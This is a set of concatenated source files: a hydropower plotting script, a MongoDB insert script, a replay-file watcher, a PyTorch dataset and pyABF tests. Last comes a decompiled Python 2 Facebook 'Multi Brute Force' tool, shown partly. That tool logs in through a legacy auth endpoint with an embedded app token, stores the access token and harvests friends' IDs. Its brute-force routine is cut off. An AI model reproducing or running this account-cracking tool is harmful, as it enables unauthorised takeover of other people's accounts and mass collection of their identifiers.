plt.plot(np.array(range(months_yr)), np.nansum(ELCC_BAL_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(months_yr)), months_names_full, rotation = 'vertical')
plt.ylabel('Power generation (MWh/h)')
plt.title('monthly power generation (selected year #' + str(plot_year_multiple + 1) + ', BAL)')
plt.savefig("Total_Fig1.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. S4b, S9b)
# [plot] power mix by year
fig = plt.figure()
E_generated_BAL_bymonth_sum = [np.nansum(np.sum(E_hydro_BAL_stable_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_BAL_flexible_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_wind_BAL_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1) - np.sum(E_curtailed_BAL_bymonth, axis = 0), np.nansum(np.sum(E_solar_BAL_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_BAL_RoR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.sum(E_thermal_BAL_bymonth, axis = 0), np.sum(E_curtailed_BAL_bymonth, axis = 0)]
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[0], bottom = np.sum(E_generated_BAL_bymonth_sum[0:0], axis = 0), label = 'Hydropower (stable)', color = colour_hydro_stable)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[1], bottom = np.sum(E_generated_BAL_bymonth_sum[0:1], axis = 0), label = 'Hydropower (flexible)', color = colour_hydro_flexible)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[2], bottom = np.sum(E_generated_BAL_bymonth_sum[0:2], axis = 0), label = 'Wind power', color = colour_wind)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[3], bottom = np.sum(E_generated_BAL_bymonth_sum[0:3], axis = 0), label = 'Solar power', color = colour_solar)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[4], bottom = np.sum(E_generated_BAL_bymonth_sum[0:4], axis = 0), label = 'Hydropower (RoR)', color = colour_hydro_RoR)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[5], bottom = np.sum(E_generated_BAL_bymonth_sum[0:5], axis = 0), label = 'Thermal', color = colour_thermal)
plt.bar(np.array(range(len(simulation_years))), E_generated_BAL_bymonth_sum[6], bottom = np.sum(E_generated_BAL_bymonth_sum[0:6], axis = 0), label = 'Curtailed VRE', color = colour_curtailed)
plt.plot(np.array(range(len(simulation_years))), np.sum(E_total_bymonth, axis = 0), label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(range(len(simulation_years))), np.sum(ELCC_BAL_yearly[:,plot_HPP_multiple], axis = 1)/10**3, label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(len(simulation_years))), np.array(range(len(simulation_years))) + 1)
plt.xlabel('year')
plt.ylabel('Power generation (GWh/year)')
plt.ylim([0, np.nanmax(np.sum(E_generated_BAL_bymonth_sum, axis = 0))*1.1])
plt.title('Multiannual generation (BAL)')
plt.savefig("Total_Fig2.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. 2 main paper, Fig. S5)
# [plot] power mix for selected days of selected month
fig = plt.figure()
area_mix_full = [np.nansum(P_BAL_hydro_stable_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_hydro_flexible_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_wind_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_solar_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_hydro_RoR_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), P_BAL_thermal_hourly[hrs_year,plot_year_multiple], -1*P_BAL_curtailed_hourly[hrs_year,plot_year_multiple]]
plt.stackplot(np.array(hrs_year), area_mix_full, labels = labels_generation_BAL, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.plot(np.array(hrs_year), P_total_hourly[hrs_year,plot_year_multiple], label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(hrs_year), np.nansum(L_followed_BAL_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(np.arange(hrs_year[0],hrs_year[-1] + hrs_day,hrs_day)), days_bymonth_byyear_axis)
plt.xlim([hrs_day*plot_day_load, hrs_day*(plot_day_load + plot_num_days_multiple)])
plt.ylim([0, np.nanmax(np.sum(area_mix_full, axis = 0)*1.1)])
plt.xlabel('Day of the year')
plt.ylabel('Power generation (MWh/h)')
plt.title('Daily generation & load profiles (BAL)')
plt.savefig("Total_Fig3.png", dpi = 300, bbox_inches = 'tight')
# [check] if STOR scenario available
if option_storage == 1 and np.min(STOR_break[plot_HPP_multiple]) == 0:
# [figure] (cf. Fig. S4a, S9a)
# [plot] average monthly power mix in user-selected year
fig = plt.figure()
area_mix_STOR_bymonth = [np.nansum(E_hydro_STOR_stable_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_STOR_flexible_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_wind_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple] - E_hydro_pump_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1) - E_curtailed_STOR_bymonth[:,plot_year_multiple], np.nansum(E_solar_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_BAL_RoR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), E_thermal_STOR_bymonth[:,plot_year_multiple], E_curtailed_STOR_bymonth[:,plot_year_multiple]]/days_year[:,plot_year_multiple]*10**3/hrs_day
labels_generation_STOR = ['Hydropower (stable)', 'Hydropower (flexible)', 'Wind power', 'Solar power', 'Hydropower (RoR)', 'Thermal', 'Curtailed VRE']
plt.stackplot(np.array(range(months_yr)), area_mix_STOR_bymonth, labels = labels_generation_STOR, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.fill_between(np.array(range(months_yr)), -1*np.nansum(E_hydro_pump_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), label = 'Stored VRE', facecolor = colour_hydro_pumped)
plt.plot(np.array(range(months_yr)), E_total_bymonth[:,plot_year_multiple]/days_year[:,plot_year_multiple]*10**3/hrs_day, label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(range(months_yr)), np.nansum(ELCC_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.plot(np.array(range(months_yr)), np.zeros(months_yr), color = 'black', linewidth = 1)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(months_yr)),months_names_full, rotation = 'vertical')
plt.ylabel('Power generation (MWh/h)')
plt.title('monthly power generation (selected year #' + str(plot_year_multiple + 1) + ', STOR)')
plt.savefig("Total_Fig1_b.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. S4b, S9b)
# [plot] power mix by year
fig = plt.figure()
E_generated_STOR_bymonth_sum = [np.nansum(np.sum(E_hydro_STOR_stable_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_STOR_flexible_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_wind_STOR_bymonth[:,:,plot_HPP_multiple] - E_hydro_pump_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1) - np.sum(E_curtailed_STOR_bymonth, axis = 0), np.nansum(np.sum(E_solar_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_BAL_RoR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.sum(E_thermal_STOR_bymonth, axis = 0), np.sum(E_curtailed_STOR_bymonth, axis = 0)]
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[0], bottom = np.sum(E_generated_STOR_bymonth_sum[0:0], axis = 0), label = 'Hydropower (stable)', color = colour_hydro_stable)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[1], bottom = np.sum(E_generated_STOR_bymonth_sum[0:1], axis = 0), label = 'Hydropower (flexible)', color = colour_hydro_flexible)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[2], bottom = np.sum(E_generated_STOR_bymonth_sum[0:2], axis = 0), label = 'Wind power', color = colour_wind)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[3], bottom = np.sum(E_generated_STOR_bymonth_sum[0:3], axis = 0), label = 'Solar power', color = colour_solar)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[4], bottom = np.sum(E_generated_STOR_bymonth_sum[0:4], axis = 0), label = 'Hydropower (RoR)', color = colour_hydro_RoR)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[5], bottom = np.sum(E_generated_STOR_bymonth_sum[0:5], axis = 0), label = 'Thermal', color = colour_thermal)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[6], bottom = np.sum(E_generated_STOR_bymonth_sum[0:6], axis = 0), label = 'Curtailed VRE', color = colour_curtailed)
plt.bar(np.array(range(len(simulation_years))), -1*np.nansum(np.sum(E_hydro_pump_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), label = 'Stored VRE', color = colour_hydro_pumped)
plt.plot(np.array(range(len(simulation_years))), np.sum(E_total_bymonth, axis = 0), label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(range(len(simulation_years))), np.sum(ELCC_STOR_yearly[:,plot_HPP_multiple], axis = 1)/10**3, label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.plot(np.array(range(len(simulation_years))), np.zeros(len(simulation_years)), color = 'black', linewidth = 1)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(len(simulation_years))), np.array(range(len(simulation_years))) + 1)
plt.xlabel('year')
plt.ylabel('Power generation (GWh/year)')
plt.ylim([np.nanmin(-1*np.sum(E_hydro_pump_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0))*1.1, np.nanmax(np.sum(E_generated_STOR_bymonth_sum, axis = 0))*1.1])
plt.title('Multiannual generation (STOR)')
plt.savefig("Total_Fig2_b.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. 2 main paper, Fig. S5)
# [plot] power mix for selected days of selected month
fig = plt.figure()
area_mix_full = [np.nansum(P_STOR_hydro_stable_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_STOR_hydro_flexible_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_STOR_wind_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]] - P_STOR_pump_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_STOR_solar_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_hydro_RoR_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), P_STOR_thermal_hourly[hrs_year,plot_year_multiple], -1*P_STOR_curtailed_hourly[hrs_year,plot_year_multiple]]
plt.stackplot(np.array(hrs_year), area_mix_full, labels = labels_generation_STOR, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.fill_between(np.array(hrs_year), -1*np.nansum(P_STOR_pump_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), label = 'Stored VRE', color = colour_hydro_pumped)
plt.plot(np.array(hrs_year), P_total_hourly[hrs_year,plot_year_multiple], label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(hrs_year), np.nansum(L_followed_STOR_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.plot(np.array(hrs_year), np.zeros(len(hrs_year)), color = 'black', linewidth = 1)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(np.arange(hrs_year[0],hrs_year[-1] + hrs_day,hrs_day)), days_bymonth_byyear_axis)
plt.xlim([hrs_day*plot_day_load, hrs_day*(plot_day_load + plot_num_days_multiple)])
plt.ylim([np.nanmin(-1*np.nansum(P_STOR_pump_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0))*1.1, np.nanmax(np.sum(area_mix_full, axis = 0)*1.1)])
plt.xlabel('Day of the year')
plt.ylabel('Power generation (MWh/h)')
plt.title('Daily generation & load profiles (STOR)')
plt.savefig("Total_Fig3_b.png", dpi = 300, bbox_inches = 'tight')
|
StarcoderdataPython
|
1745844
|
<reponame>Anderson-VargasQ/mecatronicaUNT_Prog2_Digitalizaci-n_del_Sistema_de_Ventas.-
#pip install pymongo --user
#pip install dnspython --user
import pymongo
from editar_excel import list1
import random
client = pymongo.MongoClient("mongodb+srv://grupo_hailpy:<EMAIL>/Proyecto?retryWrites=true&w=majority")
db = client.test
try:
print("MongoDB version is %s" %
client.server_info()['version'])
except pymongo.errors.OperationFailure as error:
print(error)
quit(1)
my_database = client.test
my_collection = my_database.bases
#TO INSERT A SINGLE RECORD
for i in range(50):
a=random.randrange(40,60,1)
my_collection.insert_one({
"_id": list1[i][2],
"categoria": list1[i][0],
"name": list1[i][1],
"precio_costo": list1[i][3],
"precio_venta": list1[i][4],
"utilidad": list1[i][5],
"stock": a,
"reserva": 0,
"stock_disp": a,
})
"""
#TO INSERT MULTIPLE RECORDS
my_collection.insert_many([
{
"_id": 69,
"name": "andergei",
"calories": 295, "protein": 17,
"fats": { "saturated": 5.0, "trans": 0.8 },
},
{
"_id": 44,
"name": "alfredputo",
"calories": 226, "protein": 9,
"fats": { "saturated": 4.4, "trans": 0.5 },
}
])
#Finding a record
my_cursor = my_collection.find()
for item in my_cursor:
print(item["name"])
#Returns only those documents that meet specific criteria
my_cursor = my_collection.find({
"name": "pizza"
})
#To change fields inside a record
my_collection.update_one(
{ "name": "taco" }, # query
{
"$set": { # new data
"fiber": 3.95,
"sugar": 0.9
}
}
)
"""
|
StarcoderdataPython
|
3285100
|
<filename>src/workers.py
import os
from time import time
from src.db import DB
from src.replay import Replay
from src.evaluation import Match
class File(object):
def __init__(self, file_name):
self.name = file_name
self.processed = False
self.last_processed = None
def mark_processed(self):
self.processed = True
self.last_processed = time()
class ReplayFile(File):
def __init__(self, file_name):
super().__init__(file_name=file_name)
# Extract information from file name
strp_file_name = file_name.split('-')
strp_match_info = strp_file_name[3].split(' ')
strp_team_info = strp_file_name[4].split(' ')
# get match & map info
self.match_id = int(strp_match_info[2])
self.round_id = int(strp_match_info[-2])
# get team info
team_1 = strp_team_info[1]
team_2 = strp_team_info[-2]
self.teams = [team_1, team_2]
class DirectoryWatchDog(object):
def __init__(self, working_dir, config_dir):
self._working_dir = working_dir
self._last_state_file = os.path.join(config_dir, 'files.csv')
self.dir_content = {}
self.update()
def update(self):
current_state = os.listdir(self._working_dir)
previous_state = list(self.dir_content.keys())
added_files = [
file_name for file_name in current_state
if file_name not in previous_state
]
removed_files = [
file_name for file_name in previous_state
if file_name not in current_state
]
if len(added_files) > 0:
self.add_files(file_names=added_files)
if len(removed_files) > 0:
self.remove_files(file_names=removed_files)
def add_file(self, file_name):
self.dir_content[file_name] = File(file_name=file_name)
def add_files(self, file_names):
for file_name in file_names:
self.add_file(file_name=file_name)
def remove_file(self, file_name):
del self.dir_content[file_name]
def remove_files(self, file_names):
for file_name in file_names:
self.remove_file(file_name=file_name)
def mark_processed(self, file_name):
self.dir_content[file_name].mark_processed()
class ReplayDirectoryWatchDog(DirectoryWatchDog):
def add_file(self, file_name):
self.dir_content[file_name] = ReplayFile(file_name=file_name)
class DataBaseUpdater(object):
def __init__(self, watch_dog, db_path, db_framework='sqlite'):
self._db = DB(path=db_path, framework=db_framework)
self._watchdog = watch_dog
if not os.path.exists(db_path):
self._db.create_db()
def update(self):
for file_name in self._watchdog.dir_content:
pass
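

if __name__ == "__main__":
    # Hedged usage sketch: the directory names below are assumptions; point
    # them at a folder of replay files and a config folder to try this out.
    watchdog = ReplayDirectoryWatchDog(working_dir="replays", config_dir="config")
    watchdog.update()  # re-scan (the constructor already did an initial scan)
    for name, replay_file in watchdog.dir_content.items():
        print(name, replay_file.match_id, replay_file.teams)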
|
StarcoderdataPython
|
3206620
|
# -*- coding:utf-8 -*-
# @Time: 2020/1/14 9:13
# @Author: jockwang, <EMAIL>
from torch.utils.data import Dataset
import torch
import logging
import pandas as pd
from sklearn.model_selection import train_test_split
import numpy as np
class MyDataset(Dataset):
def __init__(self, mode='train', item_size=0, dataset='book'):
super(MyDataset, self).__init__()
df = pd.read_csv('/content/drive/My Drive/Colab Notebooks/Graph4CTR/data/' + dataset + '/ratings_final.txt',
sep='\t', header=None, index_col=None).values
train, test = train_test_split(df, test_size=0.2, random_state=2019)
self.item_size = item_size
if mode == 'train':
self.data = train
else:
self.data = test
logging.info(mode + ' set size:' + str(self.data.shape[0]))
def __getitem__(self, index):
temp = self.data[index]
item = np.zeros(shape=(1, self.item_size))
item[0, temp[1]] = 1
return torch.tensor(temp[0], dtype=torch.long), torch.tensor(item, dtype=torch.float), torch.tensor(
[temp[2]], dtype=torch.float)
def __len__(self):
return len(self.data)
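

if __name__ == "__main__":
    # Hedged usage sketch: wraps the dataset in a DataLoader.  The item_size
    # value is an assumption, and the CSV path hard-coded in __init__ must
    # exist (it points at the original Colab drive layout).
    from torch.utils.data import DataLoader
    train_set = MyDataset(mode="train", item_size=10000, dataset="book")
    loader = DataLoader(train_set, batch_size=32, shuffle=True)
    users, items, labels = next(iter(loader))
    print(users.shape, items.shape, labels.shape)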
|
StarcoderdataPython
|
3359595
|
"""
Check the first value of every ABF to ensure it matches what we expect.
"""
import sys
import pytest
import datetime
import inspect
import numpy as np
import glob
try:
# this ensures pyABF is imported from this specific path
sys.path.insert(0, "src")
import pyabf
except:
raise ImportError("couldn't import local pyABF")
FIRSTVALUES = {}
FIRSTVALUES['05210017_vc_abf1'] = ['-136.29149', '11625.36621']
FIRSTVALUES['14o08011_ic_pair'] = ['-65.52124', '-56.12183']
FIRSTVALUES['14o16001_vc_pair_step'] = ['-25.87890', '-31.49414']
FIRSTVALUES['16d05007_vc_tags'] = ['0.85449']
FIRSTVALUES['16d22006_kim_gapfree'] = ['0.01007', '0.13641']
FIRSTVALUES['171116sh_0011'] = ['-125.73241']
FIRSTVALUES['171116sh_0012'] = ['-120.23925']
FIRSTVALUES['171116sh_0013'] = ['-103.51562']
FIRSTVALUES['171116sh_0014'] = ['-109.98534']
FIRSTVALUES['171116sh_0015'] = ['-119.38476']
FIRSTVALUES['171116sh_0016'] = ['-61.43188']
FIRSTVALUES['171116sh_0017'] = ['-61.70654']
FIRSTVALUES['171116sh_0018'] = ['-62.46948']
FIRSTVALUES['171116sh_0019'] = ['-62.43896']
FIRSTVALUES['171116sh_0020'] = ['72.75390']
FIRSTVALUES['171117_HFMixFRET'] = [
'-0.43945', '-94.87915', '0.06989', '0.07080']
FIRSTVALUES['17o05024_vc_steps'] = ['-21.36230']
FIRSTVALUES['17o05026_vc_stim'] = ['-16.11328']
FIRSTVALUES['17o05027_ic_ramp'] = ['-48.00415']
FIRSTVALUES['17o05028_ic_steps'] = ['-47.08862']
FIRSTVALUES['180415_aaron_temp'] = ['-0.35187', '25.02339']
FIRSTVALUES['2018_04_13_0016a_original'] = ['-115.96679', '-15.25879']
FIRSTVALUES['2018_04_13_0016b_modified'] = ['-115.96679', '-7.44399']
FIRSTVALUES['model_vc_ramp'] = ['-138.42772']
FIRSTVALUES['model_vc_step'] = ['-140.13670']
FIRSTVALUES['18702001-biphasicTrain'] = ['-10.74219', '-1.03607']
FIRSTVALUES['18702001-cosTrain'] = ['-8.05664', '-1.03638']
FIRSTVALUES['18702001-pulseTrain'] = ['-11.71875', '-1.03607']
FIRSTVALUES['18702001-ramp'] = ['-12.20703', '-1.03638']
FIRSTVALUES['18702001-step'] = ['-10.49805', '-1.03546']
FIRSTVALUES['18702001-triangleTrain'] = ['-9.88769', '-1.03577']
FIRSTVALUES['130618-1-12'] = ['-188.33015']
FIRSTVALUES['18711001'] = ['-66.66565']
FIRSTVALUES['18713001'] = ['-64.27002']
FIRSTVALUES['sine sweep magnitude 20'] = ['0.00000']
FIRSTVALUES['171116sh_0015-ATFwaveform'] = ['-119.38476']
FIRSTVALUES['2018_08_23_0009'] = ['-138.42772']
FIRSTVALUES['18807005'] = ['506.59180']
FIRSTVALUES['18808025'] = ['-14.77051']
FIRSTVALUES['File_axon_2'] = ['-55.28870']
FIRSTVALUES['File_axon_3'] = ['-15.50000', '-22000.00000']
# ABFFIO.DLL TELLS ME File_axon_3 SHOULD BE: ['-0.15500', '-55.00000']
FIRSTVALUES['File_axon_4'] = ['-0.00610']
FIRSTVALUES['File_axon_5'] = ['-71.05103']
FIRSTVALUES['File_axon_6'] = ['-56.47583', '-0.03357']
FIRSTVALUES['File_axon_7'] = ['-1.48067']
FIRSTVALUES['File_axon_1'] = ['2.18811']
FIRSTVALUES['abf1_with_tags'] = ['-34.54589']
FIRSTVALUES['2018_11_16_sh_0006'] = ['-119.14062']
FIRSTVALUES['sample trace_0054'] = ['0.00931']
FIRSTVALUES['f1'] = ['-30.51758', '-4.27246', '3100.58594', '3445.43457']
FIRSTVALUES['171116sh_0020_saved'] = ['72.72339']
FIRSTVALUES['f1_saved'] = ['-30.51758']
FIRSTVALUES['2018_12_09_pCLAMP11_0001'] = ['-3.65051']
FIRSTVALUES['18425108'] = ['0.07935', '-71.35010']
FIRSTVALUES['2018_05_08_0028-IC-VC-pair'] = ['-68.57300', '-153.32030']
FIRSTVALUES['18425108_abf1'] = ['0.07935', '-71.31958']
FIRSTVALUES['pclamp11_4ch'] = ['-0.24017', '-0.08545', '-0.00793', '0.27313']
FIRSTVALUES['pclamp11_4ch_abf1'] = [
'-0.23987', '-0.08514', '-0.00763', '0.27313']
FIRSTVALUES['2018_12_15_0000'] = ['-0.16541', '0.26764', '0.04761', '-0.28351']
FIRSTVALUES['vc_drug_memtest'] = ['-7.20215']
FIRSTVALUES['190619B_0003'] = ['-65.91796', '-18.92090']
FIRSTVALUES['19212027'] = ['-197.14355', '-70.55664']
FIRSTVALUES['multichannelAbf1WithTags'] = ['0.85449', '-49.98370']
FIRSTVALUES['H19_29_150_11_21_01_0011'] = ['-67.95654', '-0.48828']
FIRSTVALUES['DM1_0000'] = ['-0.91553', '-1.35803']
FIRSTVALUES['DM1_0001'] = ['-2.13623', '-1.19019']
FIRSTVALUES['DM1_0002'] = ['-3.66211', '-1.28174']
FIRSTVALUES['DM1_0003'] = ['-1.52588', '-1.35803']
FIRSTVALUES['2019_05_02_DIC2_0011'] = ['-67.71851', '16.17432']
FIRSTVALUES['2019_07_24_0055_fsi'] = ['-53.92456']
FIRSTVALUES['opto_aps_bad_units'] = ['-1586.91406']
FIRSTVALUES['opto_aps_good_units'] = ['-75.98877']
FIRSTVALUES['19122043'] = ['-0.00031', '0.00031', '-173.88916', '4.88281']
FIRSTVALUES['ch121219_1_0001'] = ['-42.75513', '36.62109']
FIRSTVALUES['invalidDate-abf1'] = ['-138.39722']
FIRSTVALUES['invalidDate-abf2'] = ['-138.42772']
@pytest.mark.parametrize("abfPath", glob.glob("data/abfs/*.abf"))
def test_valuesMatch_firstValue(abfPath):
abf = pyabf.ABF(abfPath)
firstValues = []
for channel in abf.channelList:
abf.setSweep(0, channel)
firstValues.append("%.05f" % (abf.sweepY[0]))
if not abf.abfID in FIRSTVALUES.keys():
raise NotImplementedError(
"MISSING VALUES FOR %s: %s" % (abf.abfID, firstValues))
elif firstValues != FIRSTVALUES[abf.abfID]:
print("\n\nERROR WITH", abf.abfID)
print(" expected:", FIRSTVALUES[abf.abfID])
print(" actual:", firstValues)
raise ValueError(
"VALUE ERROR FOR: %s\nEXPECTED: %s\nGOT: %s" %
(abf.abfID, FIRSTVALUES[abf.abfID], firstValues))
|
StarcoderdataPython
|
192618
|
<reponame>shyamjangid07/Reverse-Engineering
# Decompiled by HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
#---------------------------------------
# Source File : pro.py
# Time : Sun Feb 14 08:34:41 2021
#---------------------------------------
# uncompyle6 version 3.7.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15)
# [GCC 8.3.0]
# Embedded file name: <hekelpro>
import os, sys, time, json, urllib, threading, requests
d = '\x1b[90;1m'
m = '\x1b[91;1m'
h = '\x1b[92;1m'
k = '\x1b[93;1m'
b = '\x1b[94;1m'
p = '\x1b[95;1m'
a = '\x1b[96;1m'
pu = '\x1b[97;1m'
count = 0
dados1 = []
gagal = []
oradadi = []
threads = []
id_konco = []
def ival(nob):
color = {'d': 90, 'm': 91, 'h': 92, 'k': 93, 'b': 94, 'p': 95, 'a': 96, 'w': 97}
for iv in color:
nob = nob.replace('\r%s' % iv, '\x1b[%s;1m' % color[iv])
nob += '\x1b[0m'
nob = nob.replace('\r0', '\x1b[0m')
print nob
def run(noob):
for i in noob + '\n':
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(10.0 / 1000)
def clear():
os.system('clear')
def banner():
clear()
ival('\ra\n \n _____ __. _____ \n / \\_ |___/ ____/ \rw\n / \\ / \\| __ \\ __\\ \ra \n / Y \\ \\_\\ \\ | \n \\____|__ /___ /__| \n \\/ \\/ \n \rw+==============================+\n \ra| MULTI BRUTE FORCE |\n \rw+==============================+ \n \rd==========================\n \rp[ \rwCreated by \raIqbal Dev\rp ]\n \rp[ \rwThanks to \raIvana Raa/\rp ]\n \rd==========================')
def logout():
try:
print k + ' [' + pu + '1' + k + ']' + a + ' Keluar Dari Program..'
print k + ' [' + pu + '2' + k + ']' + a + ' Keluar Dari Akun Facebook..'
iqbal = raw_input(p + ' [?]' + h + ' Pilih Salah Satu.. ' + a + '[' + pu + ' 1 / 2' + a + ' ]\x1b[97m: ')
if iqbal == '1':
print d + ' Keluar Dari Program..'
elif iqbal == '2':
print k + ' Keluar Dari Akun Fb...'
print h + ' Anda Harus Login Fb Lagi..'
os.system('rm -f token.txt')
else:
print m + 'Pilih yg Bener Cuk..'
logout()
except KeyboardInterrupt:
sys.exit()
def login():
try:
token = open('token.txt', 'r')
mbf()
sel()
except IOError as KeyError:
banner()
user_name = raw_input(p + ' [' + h + '+log' + p + ']' + a + ' Username' + pu + ': ')
password = raw_input(p + ' [' + h + '+log' + p + ']' + a + ' Password' + d + ': ')
req = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user_name + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
dev = req.content
jsl = json.loads(dev)
if 'session_key' in dev:
print
run(h + ' Berhasil Login\x1b[97m........')
open('token.txt', 'w').write(jsl['access_token'])
run(h + ' Login Sukses\x1b[97m........')
print
id_teman()
elif 'www.facebook.com' in jsl['error_msg']:
print
print k + ' Akun Kena Cekpoint..'
print
sys.exit()
else:
print
print m + ' Gagal Login...'
print
sys.exit()
except KeyboardInterrupt:
print
print d + ' Keluar Dari Program..'
def id_teman():
try:
token = open('token.txt', 'r').read()
except IOError:
print m + ' Tidak ada token...'
os.system('rm -f token.txt')
else:
try:
req = requests.get('https://graph.facebook.com/me/friends?access_token=' + token)
jsl = json.loads(req.text)
simpan_id = open('id.txt', 'w')
for ival in jsl['data']:
id_konco.append(ival['id'])
simpan_id.write(ival['id'] + '\n')
data_id = open('id.txt', 'r').read().split()
sys.stdout.write('\r \x1b[95m [$]\x1b[92m Mengambil ID Teman \x1b[97m=> ' + str(len(data_id)))
sys.stdout.flush()
simpan_id.close()
print
print a + '\n ID Tersimpan ' + p + '(' + pu + 'id.txt' + p + ')'
print
iqbal = requests.get('https://graph.facebook.com/me?access_token=' + token)
dev = json.loads(iqbal.text)
nama = dev['name']
print h + ' [ ' + p + 'Lanjutkan ' + pu + nama + h + ' ]\n'
raw_input(k + ' => ')
except IOError:
print m + ' Terjadi kesalahan...'
def mbf():
global listID
global nama
global password
try:
token = open('token.txt', 'r')
except IOError:
print
print m + ' Token Tidak Ada'
os.system('rm -f token.txt')
login()
else:
print
banner()
try:
token = open('token.txt', 'r').read()
iqbal_name = requests.get('https://graph.facebook.com/me?access_token=' + token)
dev = json.loads(iqbal_name.text)
